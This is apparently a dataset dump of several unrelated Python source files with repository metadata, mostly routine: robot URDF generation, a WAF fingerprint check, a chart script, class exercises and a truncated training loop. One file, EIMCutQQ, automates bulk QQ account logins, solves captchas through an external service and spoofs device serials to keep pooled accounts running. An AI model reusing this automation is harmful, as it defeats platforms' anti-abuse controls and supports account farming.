| null |
UTF-8
|
Python
| false
| false
| 83
|
py
|
from .segm_sk_max import SegmSKMax
def get_tracker_class():
return SegmSKMax
|
[
"752958525@qq.com"
] |
752958525@qq.com
|
3704fbcb4f01956c37fe375541cac714ce70e6ec
|
06cf972369c30da9d98b296bcbc26a826aa98126
|
/aloisioimoveis/locations/apps.py
|
a01c82bdc98cf361b23558596a1fe65896a0c146
|
[] |
no_license
|
thiagorossener/aloisioimoveis
|
2597422af6ac058ed3b8aa6e58f0f8913488a7fe
|
f9d974440f9a8cc875da8a1d4a5c885429563c1b
|
refs/heads/master
| 2021-06-16T23:02:11.193518
| 2021-02-01T14:17:10
| 2021-02-01T14:17:10
| 94,144,023
| 18
| 17
| null | 2021-06-10T20:35:48
| 2017-06-12T21:55:18
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 156
|
py
|
from django.apps import AppConfig
class LocationsConfig(AppConfig):
name = 'aloisioimoveis.locations'
verbose_name = 'Controle de Localizações'
|
[
"thiago.rossener@gmail.com"
] |
thiago.rossener@gmail.com
|
ae9dabdb231bafe65155539cc2eb4064a18766ef
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02391/s357788596.py
|
98d6068bc7580b5bf0215d2b95c7e9d07ff5810d
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 141
|
py
|
v=raw_input()
a=int(v[:v.find(" ")])
b=int(v[v.find(" "):])
if(a>b):
print "a > b"
elif(a<b):
print "a < b"
else:
print "a == b"
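# Editor's note: the snippet above is Python 2 (raw_input, print statements).
# An equivalent in Python 3, using split() instead of find():
#
#     a, b = map(int, input().split())
#     if a > b:
#         print("a > b")
#     elif a < b:
#         print("a < b")
#     else:
#         print("a == b")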
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
4fb2c6fdfd1cff89412f02edfe39d142b07f782d
|
9bdc01fddc660053e23eaf89302f9b8e5daaefdf
|
/scripts/urdf_create/urdf_create_Lshape.py
|
22aabaa0a96e6fc830fee1f784b3af2cdc631108
|
[] |
no_license
|
hello-starry/MotionExplorer
|
51d4ca1a1325567968ac2119de7c96b0345e5b10
|
01472004a1bc1272ce32a433fe6bde81eb962775
|
refs/heads/master
| 2023-08-14T21:20:22.073477
| 2021-09-07T17:51:20
| 2021-09-07T17:51:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,105
|
py
|
import os
import numpy as np
from math import cos,sin,pi,atan2
from urdf_create import *
from urdf_create_primitives import *
L1 = 1.7
L2 = 1.2
thicknessx = 0.2
thicknessy = 1.5
robot_name = 'Lshape/Lshape'
fname = getPathname(robot_name)
f = open(fname,'w')
f.write('<?xml version="1.0"?>\n')
f.write('<robot name="'+robot_name+'">\n')
hstr = createCuboid("link1",0,0,0,L1,thicknessy,thicknessx)
#hstr += createCuboid("link2",-L1/2,0,thickness/2+L2/2,thickness,thickness,L2)
hstr += createCuboid("link2",-L1/2+thicknessx/2,0,L2/2+thicknessx/2,thicknessx,thicknessy,L2)
hstr += createRigidJoint( "link1", "link2")
f.write(hstr)
f.write(' <klampt package_root="../../.." default_acc_max="4" >\n')
f.write(' </klampt>\n')
f.write('</robot>')
f.close()
print "\nCreated new file >>",fname
### create nested robots
CreateSphereRobot(robot_name + "_sphere_inner", thicknessx/2)
d = np.sqrt((L1/2)**2+L2**2)
CreateSphereRobot(robot_name + "_sphere_outer", d)
CreateCylinderRobot(robot_name + "_capsule_inner", thicknessx/2, L1)
CreateCylinderRobot(robot_name + "_capsule_outer", L2+thicknessx/2, L1)
|
[
"andreas.orthey@gmx.de"
] |
andreas.orthey@gmx.de
|
fe8f88f236d3472237c2ee9d9b15bb78a60de4ab
|
31476faeaeac0f7ca2821235899b126736f04887
|
/waf/trafficshield.py
|
b167f11e932c4017b9bfa57291b03b98ed1b8f79
|
[] |
no_license
|
h3r1C0d3/sqlmap
|
4489335963097b62e40b6a4d9197577744a60295
|
bdf72b0ffa309d56d697b3fd91ac0388208b9445
|
refs/heads/master
| 2021-01-21T00:30:16.796660
| 2013-02-22T16:34:53
| 2013-02-22T16:34:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTPHEADER
__product__ = "TrafficShield (F5 Networks)"
def detect(get_page):
page, headers, code = get_page()
return (re.search(r"\AASINFO=", headers.get(HTTPHEADER.COOKIE, ""), re.I) or re.search(r"F5-TrafficShield", headers.get(HTTPHEADER.SERVER, ""), re.I)) is not None
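# Editor's sketch of the get_page contract this detector expects: a zero-argument
# callable returning (page_body, headers_dict, status_code). A hypothetical stub
# (assuming HTTPHEADER.SERVER resolves to the literal "Server"):
#
#     def fake_get_page():
#         return "", {"Server": "F5-TrafficShield"}, 200
#
#     detect(fake_get_page)  # -> True, matched via the Server header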
|
[
"miroslav.stampar@gmail.com"
] |
miroslav.stampar@gmail.com
|
050189f07fd0a95927415aec2867f1ab52b53362
|
a32c2ee4e6b2b1c6f8db02320c4bd50b17940af5
|
/modules/EIMCutQQ/EIMCutQQ.py
|
d1c8bc0e4432ff9e7a5e04f070bb97c7fad19d9a
|
[] |
no_license
|
wszg5/studyGit
|
93d670884d4cba7445c4df3a5def8085e5bf9ac0
|
bebfc90bc38689990c2ddf52e5a2f7a02649ea00
|
refs/heads/master
| 2020-04-05T02:55:17.367722
| 2018-11-07T06:01:03
| 2018-11-07T06:01:03
| 156,494,390
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,726
|
py
|
# coding:utf-8
import threading
import time
from PIL import Image
from uiautomator import Device
from imageCode import imageCode
from Repo import *
import datetime, random
from zservice import ZDevice
from slot import slot
import os
class EIMCutQQ:
def __init__(self):
self.type = 'eim'
self.repo = Repo()
self.slot = slot(self.type)
def GetUnique(self):
        nowTime = datetime.datetime.now().strftime("%Y%m%d%H%M%S");  # current timestamp
        randomNum = random.randint(0, 1000);  # random integer n, where 0 <= n <= 1000
if randomNum <= 10:
randomNum = str(00) + str(randomNum);
uniqueNum = str(nowTime) + str(randomNum);
return uniqueNum
def login(self,d,args,z):
z.heartbeat()
base_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, "tmp"))
if not os.path.isdir(base_dir):
os.mkdir(base_dir)
sourcePng = os.path.join(base_dir, "%s_s.png" % (self.GetUnique()))
codePng = os.path.join(base_dir, "%s_c.png" % (self.GetUnique()))
z.sleep(1)
t = 1
        while t == 1:  # loop until login succeeds
            time_limit1 = args['time_limit1']
            cate_id = args["repo_cate_id"]
            numbers = self.repo.GetAccount(cate_id, time_limit1, 1)
            while len(numbers) == 0:
                d.server.adb.cmd("shell", "am broadcast -a com.zunyun.zime.toast --es msg \"EIM account repo %s is empty, waiting\"" % cate_id).communicate()
                z.sleep(10)
                numbers = self.repo.GetAccount(cate_id, time_limit1, 1)
            QQNumber = numbers[0]['number']  # the QQ account about to log in
            QQPassword = numbers[0]['password']
            print('QQ number: %s, QQ password: %s' % (QQNumber, QQPassword))
            d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate()  # clear app data
            d.server.adb.cmd("shell", "am start -n com.tencent.eim/com.tencent.mobileqq.activity.SplashActivity").communicate()  # launch the app
z.sleep(3)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(5)
z.heartbeat()
d(className='android.widget.Button', index=1, clickable='true').click()
z.sleep(2)
d(className='android.widget.EditText', text='企业QQ号/手机号/邮箱').set_text(QQNumber) # 3001313499 QQNumber 3001346198
d(resourceId='com.tencent.eim:id/password', description='请输入密码').set_text(QQPassword) # Bn2kJq5l QQPassword
d(text='登 录').click()
z.sleep(4)
if d(text='企业QQ').exists:
d(text='企业QQ').click()
if d(text='仅此一次').exists:
d(text='仅此一次').click()
z.heartbeat()
            if d(text='搜索').exists:  # logged in directly
                return QQNumber  # return now that this logic lives in a method
            if d(text='帐号无法登录', resourceId='com.tencent.eim:id/dialogTitle').exists:  # account frozen
self.repo.BackupInfo(cate_id, 'frozen', QQNumber, '','')
break
icode = imageCode()
im_id = ""
            for i in range(0, 30):  # captcha-solving loop
if i > 0:
icode.reportError(im_id)
obj = d(resourceId='com.tencent.eim:id/name', className='android.widget.ImageView')
obj = obj.info
                obj = obj['bounds']  # bounds of the captcha view
                left = obj["left"]  # captcha position info
                top = obj['top']
                right = obj['right']
                bottom = obj['bottom']
                d.screenshot(sourcePng)  # screenshot the whole screen while the captcha is shown
                img = Image.open(sourcePng)
                box = (left, top, right, bottom)  # left top right bottom
                region = img.crop(box)  # crop out the captcha image
img = Image.new('RGBA', (right - left, bottom - top))
img.paste(region, (0, 0))
img.save(codePng)
im = open(codePng, 'rb')
codeResult = icode.getCode(im, icode.CODE_TYPE_4_NUMBER_CHAR)
code = codeResult["Result"]
im_id = codeResult["Id"]
os.remove(sourcePng)
os.remove(codePng)
z.heartbeat()
d(resourceId='com.tencent.eim:id/name', index='2', className="android.widget.EditText").set_text(code)
z.sleep(1)
d(text='完成').click()
z.sleep(4)
                while d(className='android.widget.ProgressBar', index=0).exists:  # slow network: captcha check still running
z.heartbeat()
z.sleep(2)
if d(text='搜索', resourceId='com.tencent.eim:id/name').exists:
return QQNumber# 放到方法里改为return
if d(text='输入验证码').exists: #验证码输入错误的情况
z.heartbeat()
continue
else:
self.repo.BackupInfo(cate_id, 'frozen', QQNumber,'') # 仓库号,使用中,QQ号,设备号_卡槽号
break
def action(self, d,z, args):
z.heartbeat()
time_limit = args['time_limit']
cate_id = args["repo_cate_id"]
        slotnum = self.slot.getEmpty(d)  # get an empty slot
        print(slotnum)
        if slotnum == 0:
            slotnum = self.slot.getSlot(d, time_limit)  # no empty slot: take one unused for time_limit hours
            while slotnum == 0:  # even the 2-hour-idle slots are unavailable
                d.server.adb.cmd("shell", "am broadcast -a com.zunyun.zime.toast --es msg \"EIM slots all full, none idle long enough\"").communicate()
                z.heartbeat()
                z.sleep(30)
                slotnum = self.slot.getSlot(d, time_limit)
            d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate()  # clear app data
            d.server.adb.cmd("shell", "settings put global airplane_mode_on 1").communicate()
            d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true").communicate()
            z.sleep(5)
            getSerial = self.repo.Getserial(cate_id, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # fetch the previously saved serial
            if len(getSerial) == 0:  # the earlier info failed to save
                d.server.adb.cmd("shell", "am broadcast -a com.zunyun.zime.toast --es msg \"failed to fetch serial, regenerating\"").communicate()  # on device 51 the repo had data, yet fetching still failed after Wang Hong's machine was shut down
                getSerial = z.generateSerial("788")  # regenerate device info
            else:
                getSerial = getSerial[0]['imei']  # info saved, but the serial itself may be missing
            print('serial at slot switch: %s' % getSerial)
            if getSerial is None:  # serial empty: save a new one under this slot
                getSerial = z.generateSerial("788")  # regenerate device info
            else:
                z.generateSerial(getSerial)  # restore the saved serial
            z.heartbeat()
            self.slot.restore(d, slotnum)  # a 2-hour-idle slot exists: switch to it
            print("switched to slot " + str(slotnum))
d.server.adb.cmd("shell", "settings put global airplane_mode_on 0").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false").communicate()
z.heartbeat()
while True:
ping = d.server.adb.cmd("shell", "ping -c 3 baidu.com").communicate()
print(ping)
                if 'icmp_seq' in ping[0] and 'bytes from' in ping[0] and 'time' in ping[0]:
break
z.sleep(2)
d.server.adb.cmd("shell", "am start -n com.tencent.eim/com.tencent.mobileqq.activity.SplashActivity").communicate() # 先将eim拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新数据').exists:
z.sleep(2)
z.sleep(4)
            z.toast('switched to slot %s' % slotnum)
z.sleep(10)
if d(text='下线通知').exists:
d(text='重新登录').click()
if d(textContains='开启精彩').exists:
d(textContains='开启精彩').click()
if d(descriptionContains='开启精彩').exists:
d(descriptionContains='开启精彩').click()
            if d(resourceId='com.tencent.eim:id/name', className='android.widget.Button').exists:  # tap "start experience"
d(resourceId='com.tencent.eim:id/name', className='android.widget.Button').click()
z.sleep(6)
if d(text='搜索').exists:
z.heartbeat()
                QQnumber = self.slot.getSlotInfo(d, slotnum)  # QQ number after the switch
                QQnumber = QQnumber['info']  # 'info' holds the QQ number
                self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
                self.repo.BackupInfo(cate_id, 'using', QQnumber, getSerial, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # repo id, status, QQ number, note: deviceid_slotid
            else:  # the switch failed
                z.heartbeat()
                serialinfo = z.generateSerial("788")  # regenerate serial and related info
                print('serial at login: %s' % serialinfo)
                QQnumber = self.login(d, args, z)
                self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
                self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # repo id, 'using', QQ number, deviceid_slotid
d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate() # 清除缓存
gener = args['kind']
if gener == '普通QQ':
self.slot.restore(d, slotnum, "com.tencent.mobileqq") # 有2小时没用过的卡槽情况,切换卡槽
print("切换为"+str(slotnum))
z.toast('切换为%s号卡槽' % slotnum)
d.server.adb.cmd("shell", "am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.SplashActivity").communicate() # 拉起来
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(10)
if d(text='重新登录').exists:
d(text='重新登录').click()
z.sleep(10)
if d(text='马上升级').exists:
d(description='取消').click()
z.sleep(10)
                if d(text='搜索').exists or d(textContains='消息').exists or d(text='主题装扮').exists or d(text='启用').exists or d(text='马上绑定').exists or d(text='寻找好友').exists or d(text='马上升级').exists or d(text='通讯录').exists:
                    z.heartbeat()
                    obj = self.slot.getSlotInfo(d, slotnum)  # QQ number after the switch
                    QQnumber = obj['info']  # 'info' holds the QQ number
                    self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
                    self.repo.BackupInfo(cate_id, 'using', QQnumber, getSerial, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # repo id, status, QQ number, note: deviceid_slotid
                    # removed code is kept in the document's backup section
                else:  # the switch failed
                    z.heartbeat()
                    serialinfo = z.generateSerial("788")  # regenerate serial and related info
                    print('serial at login: %s' % serialinfo)
                    QQnumber = self.login(d, args, z)
                    z.heartbeat()
                    self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
                    self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # repo id, 'using', QQ number, deviceid_slotid
                    d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate()  # clear app data
                    self.slot.restore(d, slotnum, "com.tencent.mobileqq")  # switch the slot again
                    z.toast('switched to slot %s' % slotnum)
                    d.server.adb.cmd("shell", "am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.SplashActivity").communicate()  # launch it
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
            else:
                self.slot.restore(d, slotnum, "com.tencent.qqlite")  # switch to the 2-hour-idle slot
                z.toast('switched to slot %s' % slotnum)
                print("switched to slot " + str(slotnum))
                d.server.adb.cmd("shell", "am start -n com.tencent.qqlite/com.tencent.mobileqq.activity.SplashActivity").communicate()  # launch it
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
                if d(text='消息').exists or d(text='启用').exists or d(text='联系人').exists:
                    z.heartbeat()
                    obj = self.slot.getSlotInfo(d, slotnum)  # QQ number after the switch
                    QQnumber = obj['info']  # 'info' holds the QQ number
                    self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
                    self.repo.BackupInfo(cate_id, 'using', QQnumber, getSerial, '%s_%s_%s' % (
                        d.server.adb.device_serial(), self.type, slotnum))  # repo id, status, QQ number, note: deviceid_slotid
                else:  # the switch failed
                    z.heartbeat()
                    serialinfo = z.generateSerial("788")  # regenerate serial and related info
                    print('serial at login: %s' % serialinfo)
                    QQnumber = self.login(d, args, z)
                    z.heartbeat()
                    self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
                    self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # repo id, 'using', QQ number, deviceid_slotid
                    d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate()  # clear app data
                    self.slot.restore(d, slotnum, "com.tencent.qqlite")  # switch the slot again
                    z.toast('switched to slot %s' % slotnum)
                    d.server.adb.cmd("shell", "am start -n com.tencent.qqlite/com.tencent.mobileqq.activity.SplashActivity").communicate()  # launch it
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
        else:  # an empty slot exists
d.server.adb.cmd("shell", "settings put global airplane_mode_on 1").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true").communicate()
z.sleep(6)
d.server.adb.cmd("shell", "settings put global airplane_mode_on 0").communicate()
d.server.adb.cmd("shell", "am broadcast -a android.intent.action.AIRPLANE_MODE --ez state false").communicate()
z.heartbeat()
while True:
ping = d.server.adb.cmd("shell", "ping -c 3 baidu.com").communicate()
print(ping)
                if 'icmp_seq' in ping[0] and 'bytes from' in ping[0] and 'time' in ping[0]:
break
z.sleep(2)
z.heartbeat()
            serialinfo = z.generateSerial("788")  # regenerate serial and related info
            print('serial at login: %s' % serialinfo)
            QQnumber = self.login(d, args, z)
            z.sleep(3)
            z.heartbeat()
            self.slot.backup(d, slotnum, QQnumber)  # device info, slot id, QQ number
            self.repo.BackupInfo(cate_id, 'using', QQnumber, serialinfo, '%s_%s_%s' % (d.server.adb.device_serial(), self.type, slotnum))  # repo id, 'using', QQ number, deviceid_slotid
            d.server.adb.cmd("shell", "pm clear com.tencent.eim").communicate()  # clear app data
            # d.server.adb.cmd("shell", "am force-stop com.tencent.eim").communicate()  # force stop  3001369923 Bn2kJq5l
            gener = args['kind']
            if gener == '普通QQ':
                self.slot.restore(d, slotnum, "com.tencent.mobileqq")  # switch the slot
                z.toast('switched to slot %s' % slotnum)
                d.server.adb.cmd("shell", "am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.SplashActivity").communicate()  # launch it
z.heartbeat()
z.sleep(2)
while d(textContains='正在更新').exists:
z.sleep(2)
z.sleep(8)
            else:  # QQ Lite edition
                self.slot.restore(d, slotnum, "com.tencent.qqlite")  # switch the slot
                z.toast('switched to slot %s' % slotnum)
                d.server.adb.cmd("shell", "am start -n com.tencent.qqlite/com.tencent.mobileqq.activity.SplashActivity").communicate()  # launch it
                z.heartbeat()
                z.sleep(2)
                while d(textContains='正在更新').exists:
                    z.sleep(2)
                z.sleep(8)
        print("switched to slot " + str(slotnum))
if (args["time_delay"]):
z.sleep(int(args["time_delay"]))
def getPluginClass():
return EIMCutQQ
if __name__ == "__main__":
import sys
reload(sys)
sys.setdefaultencoding('utf8')
clazz = getPluginClass()
d = Device("HT4AVSK00981")
z = ZDevice("HT4AVSK00981")
d.server.adb.cmd("shell", "ime set com.zunyun.qk/.ZImeService").communicate()
    args = {"repo_cate_id": "34", "time_limit": "30", "time_limit1": "10", "kind": "普通QQ", "time_delay": "3"};  # cate_id is the repo id, length is the count
o = clazz()
o.action(d,z, args)
|
[
"you@example.com"
] |
you@example.com
|
87dcad0d60cbcbc97e6aa81de84ab0345fc6ac0e
|
7e9430ab914d75f40850e8a80455a2a7c02a0871
|
/download_video.py
|
c276d917d90a97f60d0202518affad28c9a9bd20
|
[] |
no_license
|
kyle8581/YSCEC_video_download
|
86d1de7dede6d0a88f3f80b52f9aa2bd435fc4ea
|
ff8267ee7347a0af7b077dce864f0725dd940cf1
|
refs/heads/master
| 2022-12-15T23:46:15.197704
| 2020-09-21T07:46:05
| 2020-09-21T07:46:05
| 295,901,708
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 597
|
py
|
import requests
from download_chunklist import get_chunklist
BASE_URL = input("Enter the copied URL without the trailing /media_**.ts part: ")
OUTPUT_FILE_NAME = input("Enter the output video file name (e.g. yonsei.mp4): ")
chunk_size = 256
chunk_list = get_chunklist(BASE_URL+"/chunklist.m3u8")
with open(OUTPUT_FILE_NAME,'wb') as f:
for ts in chunk_list:
cur_url = BASE_URL+"/"+ts
r = requests.get(cur_url, stream=True)
for chunk in r.iter_content(chunk_size= chunk_size):
f.write(chunk)
print(ts+"...ok")
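# Editor's sketch: get_chunklist comes from a sibling module not shown here. A
# minimal, hypothetical implementation consistent with how it is used above
# (fetch the m3u8 playlist and keep the .ts segment names):
#
#     def get_chunklist(playlist_url):
#         r = requests.get(playlist_url)
#         return [line.strip() for line in r.text.splitlines()
#                 if line.strip().endswith(".ts")]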
|
[
"mapoout@naver.com"
] |
mapoout@naver.com
|
bc1b83d6e902871ab6739786405a1625f4cf20ed
|
7ffff207e11464af0c3a61a917a7dd0df09e27a1
|
/ceo_compensation/dot_pairs_ceo_compensation.py
|
d3ebe9dd441efe06cf2143e3eb81a5e6b7c8e818
|
[
"MIT"
] |
permissive
|
aaronpenne/data_visualization
|
082100f8c401ee3ba403d116f98deada0d4d804a
|
8eb84303e5de4ec4b407432a823869cbb9099bc2
|
refs/heads/master
| 2022-09-16T01:12:27.101444
| 2022-08-02T05:30:22
| 2022-08-02T05:30:22
| 108,087,423
| 356
| 76
|
MIT
| 2020-11-30T22:23:06
| 2017-10-24T06:42:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,903
|
py
|
# -*- coding: utf-8 -*-
"""
Attempting to improve this: https://www.reddit.com/r/dataisbeautiful/comments/842tvn/highestpaid_ceos_in_america_oc/
Author: Aaron Penne
Created: 2018-03-13
Developed with:
Python 3.6
Windows 10
"""
import pandas as pd
import matplotlib.pyplot as plt
import os
# Set output directory, make it if needed
output_dir = os.path.realpath(r'C:\tmp\ceo') # Windows machine
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
# Get input data
input_file = os.path.realpath(r'C:\tmp\data_ceo_compensation.txt')
df = pd.read_csv(input_file)
df = df.sort_values(['annual_compensation'])
df = df.reset_index(drop=True)
# Normalize to M and B
df['annual_compensation'] = df['annual_compensation']/1000000
df['annual_revenue'] = df['annual_revenue']/1000000000
fig, ax = plt.subplots(figsize=(8, 6), dpi=150)
for i in df.index:
x = [df.loc[i,'annual_compensation'], df.loc[i, 'annual_revenue']]
y = [i, i]
print(x, y)
plt.plot(x, y,
color='gray',
linestyle='-',
linewidth=1)
if x[0] > x[1]:
plt.text(x[0]+4, y[0], df.loc[i, 'ceo'], horizontalalignment='left', verticalalignment='center', weight='bold')
plt.text(x[1]-4, y[1], df.loc[i, 'company'], horizontalalignment='right', verticalalignment='center')
else:
plt.text(x[0]-4, y[0], df.loc[i, 'ceo'], horizontalalignment='right', verticalalignment='center', weight='bold')
plt.text(x[1]+4, y[1], df.loc[i, 'company'], horizontalalignment='left', verticalalignment='center')
# Plot CEO compensation (green dots)
x = df.loc[:,'annual_compensation']
y = df.index
plt.plot(x, y,
color='#65C2A5',
linestyle='None',
marker='o',
markersize=7,
fillstyle='full')
# Plot company revenue (orange dots)
x = df.loc[:,'annual_revenue']
y = df.index
plt.plot(x, y,
color='#FC8D62',
linestyle='None',
marker='o',
markersize=7,
fillstyle='full')
# Despine
for side in ['right', 'left', 'top', 'bottom']:
ax.spines[side].set_visible(False)
plt.ylim([-1, 13])
plt.xlim([-50, 150])
plt.xticks(range(0,101,10), color='gray')
ax.set_yticklabels('')
plt.text(-50, 12, 'Annual Company Revenue and Annual CEO Compensation',
horizontalalignment='left',
size=16,
weight='bold')
plt.text(-50, 11, 'Company revenue is in $Billions.',
horizontalalignment='left',
color='#FC8D62',
size=14)
plt.text(42, 11, 'CEO compensation is in $Millions.',
horizontalalignment='left',
color='#65C2A5',
size=14)
plt.text(-50, -3, '© 2018 Aaron Penne\nSource: u/k0m0d0z0',
horizontalalignment='left',
color='gray',
size=8)
# Reveal
plt.show()
# Save
fig.savefig(os.path.join(output_dir, 'dot_pairs_ceo.png'),
dpi=fig.dpi,
bbox_inches='tight',
pad_inches=0.3)
|
[
"aaronpenne@users.noreply.github.com"
] |
aaronpenne@users.noreply.github.com
|
402912bcb5d4de24217c9ca835f0151bdfa497d1
|
5daebb0caaf282149f0bd0f063f3cf91c0d222b5
|
/0x08-python-more_classes/3-rectangle.py
|
69774ab43dfd88ea60794d956cbf3e1a6184a04f
|
[] |
no_license
|
yacinekedidi/holbertonschool-higher_level_programming
|
0ad09a6263ccf2a75f5f5e83fb6c219a0935818e
|
a970ba4e737524f433be6b7654809ffff4d1168e
|
refs/heads/master
| 2022-12-20T10:58:57.770269
| 2020-09-24T12:33:51
| 2020-09-24T12:33:51
| 259,281,605
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,470
|
py
|
#!/usr/bin/python3
"""module contains a function.
"""
class Rectangle:
"""
Defines a rectangle
"""
def __init__(self, width=0, height=0):
self.width = width
self.height = height
def __str__(self):
s = ""
if self.__width == 0 or self.__height == 0:
return s
for i in range(self.__height):
for j in range(self.__width):
s += "#"
s += "\n"
return s[:-1]
@property
def height(self):
return self.__height
@height.setter
def height(self, value):
if type(value) is not int:
raise TypeError("height must be an integer")
if value < 0:
raise ValueError("height must be >= 0")
self.__height = value
@property
def width(self):
return self.__width
@width.setter
def width(self, value):
if type(value) is not int:
raise TypeError("width must be an integer")
if value < 0:
raise ValueError("width must be >= 0")
self.__width = value
def area(self):
"""
function returns the area of the rectangle
"""
return self.__width * self.__height
def perimeter(self):
"""
function that returns the perimeter of the rectangle
"""
if (self.__height == 0 or self.__width == 0):
return (0)
return 2 * (self.__width + self.__height)
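# Editor's usage example for the class above:
if __name__ == "__main__":
    r = Rectangle(3, 2)
    print(r)              # two rows of "###"
    print(r.area())       # 6
    print(r.perimeter())  # 10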
|
[
"kedidiyacine@gmail.com"
] |
kedidiyacine@gmail.com
|
944d89ed198b9de755b4dfd5d45e7c18ecf79503
|
05881f001e96ecc32013c96cf5d13b0e008c7f4e
|
/Train/transfer_0826.py
|
92cff5e0d343ed07785aca6477c120f51ec3cae6
|
[] |
no_license
|
cht619/Domain-Adaption
|
0c22b6f1e2f0f5670c41870d8f4096d8ab551f77
|
e53d89237c2fc8137b57e7bd11d4cdcb669cd15f
|
refs/heads/master
| 2022-12-09T08:29:26.055453
| 2020-08-26T04:20:11
| 2020-08-26T04:20:11
| 290,379,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,694
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/8/26 9:21
# @Author : CHT
# @Blog : https://www.zhihu.com/people/xia-gan-yi-dan-chen-hao-tian
# @Site :
# @File : transfer_0826.py
# @Function: mainly revises the loss functions
# @Software: PyCharm
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd.variable import *
import os
from collections import *
import params
import time
from utils import *
from torchvision.utils import save_image
FloatTensor = torch.cuda.FloatTensor
LongTensor = torch.cuda.LongTensor
def train(discriminator, classifier, dataloader_src, dataloader_tgt, train_epochs, domain_label, loss_weight):
"""
:param domain_label:
:param train_epochs:
:param discriminator:
:param classifier:
:param dataloader_src:
:param dataloader_tgt:
"""
discriminator.train()
classifier.train()
loss_d = torch.nn.BCELoss()
# loss_d = torch.nn.MSELoss()
loss_c = torch.nn.CrossEntropyLoss()
scheduler = lambda step, initial_lr: inverseDecaySheduler(step, initial_lr, gamma=10, power=0.75, max_iter=3000)
optimizer_c = OptimWithSheduler(optim.Adam(classifier.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
optimizer_d = OptimWithSheduler(optim.Adam(discriminator.parameters(), weight_decay=5e-4, lr=1e-5),
scheduler)
    # losses and distances, saved for plotting later
sample_distance_src = []
sample_distance_tgt = []
discriminator_loss = []
discriminator_f_loss = []
classifier_loss = []
classifier_f_loss = []
epochs = []
len_dataloader = min(len(dataloader_src), len(dataloader_tgt))
for epoch in range(train_epochs[0]):
start = time.time()
data_zip = enumerate(zip(dataloader_src, dataloader_tgt))
for st, ((imgs_src, labels_src), (imgs_tgt, labels_tgt)) in data_zip:
# adjust_lr(optimizer_c, step, optimizer_c.param_groups[0]['lr'])
# adjust_lr(optimizer_d, step, optimizer_d.param_groups[0]['lr'])
# =========================generate transferable examples
feature_fooling_src = Variable(
imgs_src.type(FloatTensor), requires_grad=True).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
            feature_fooling_src0 = feature_fooling_src.detach()  # keep the original source images for reference
            feature_fooling_tgt = Variable(
                imgs_tgt.type(FloatTensor), requires_grad=True).reshape(imgs_tgt.shape[0], -1)
            feature_fooling_tgt0 = feature_fooling_tgt.detach()  # keep the original target images for reference
for i_t in range(train_epochs[1]):
                # Target Domain
                # update feature_fooling_tgt via gradient ascent on the discriminator loss
discriminator.zero_grad()
classifier.zero_grad()
scores = discriminator(feature_fooling_tgt)
